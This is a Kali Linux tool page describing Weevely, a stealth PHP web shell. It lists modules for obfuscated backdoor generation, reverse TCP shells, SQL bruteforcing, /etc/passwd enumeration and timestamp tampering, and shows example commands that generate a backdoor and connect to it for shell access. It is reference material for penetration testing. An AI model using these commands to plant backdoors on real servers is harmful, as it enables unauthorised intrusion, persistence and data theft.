Weevely Package Description
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
Source: https://github.com/epinna/Weevely/
Weevely Homepage | Kali Weevely Repo
- Author: Weevely Developers
- License: GPLv2
Tools included in the weevely package
weevely – Stealth tiny web shell
[email protected]:~# weevely help
+--------------------+------------------------------------------------------+
| generator | description |
+--------------------+------------------------------------------------------+
| :generate.img | Backdoor existing image and create related .htaccess |
| :generate.htaccess | Generate backdoored .htaccess |
| :generate.php | Generate obfuscated PHP backdoor |
+--------------------+------------------------------------------------------+
+----------------------+------------------------------------------------------------------------------+
| module | description |
+----------------------+------------------------------------------------------------------------------+
| :audit.systemfiles | Find wrong system files permissions |
| :audit.userfiles | Guess files with wrong permissions in users home folders |
| :audit.mapwebfiles | Crawl and enumerate web folders files permissions |
| :audit.phpconf | Check php security configurations |
| :audit.etcpasswd | Enumerate users and /etc/passwd content |
| :shell.sh | Execute system shell command |
| :shell.php | Execute PHP statement |
| :system.info | Collect system informations |
| :find.name | Find files with matching name |
| :find.perms | Find files with write, read, execute permissions |
| :find.suidsgid | Find files with superuser flags |
| :backdoor.reversetcp | Send reverse TCP shell |
| :backdoor.tcp | Open a shell on TCP port |
| :bruteforce.sql | Bruteforce SQL username |
| :bruteforce.sqlusers | Bruteforce all SQL users |
| :file.read | Read remote file |
| :file.webdownload | Download web URL to remote filesystem |
| :file.mount | Mount remote filesystem using HTTPfs |
| :file.enum | Enumerate remote paths |
| :file.upload2web | Upload binary/ascii file into remote web folders and guess corresponding url |
| :file.check | Check remote files type, md5 and permission |
| :file.rm | Remove remote files and folders |
| :file.ls | List directory contents |
| :file.touch | Change file timestamps |
| :file.download | Download binary/ascii files from the remote filesystem |
| :file.upload | Upload binary/ascii file into remote filesystem |
| :file.edit | Edit remote file |
| :sql.console | Run SQL console or execute single queries |
| :sql.dump | Get SQL database dump |
| :net.ifaces | Print interfaces addresses |
| :net.proxy | Install and run Proxy to tunnel traffic through target |
| :net.phpproxy | Install remote PHP proxy |
| :net.scan | Port scan open TCP ports |
+----------------------+------------------------------------------------------------------------------+
Hint: Run ':help <module>' to print detailed usage informations.
weevely Usage Example
Generate a PHP backdoor (generate) protected with the given password (s3cr3t).
[email protected]:~# weevely generate s3cr3t
[generate.php] Backdoor file 'weevely.php' created with password 's3cr3t'
[email protected]:~# weevely http://192.168.1.202/weevely.php s3cr3t
________ __
| | | |----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|____|____|___/|____|__|___ | v1.1
|_____|
Stealth tiny web shell
[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.1.202/weevely.session'
[email protected]:/var/www $ uname
Linux
[email protected]:/var/www $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)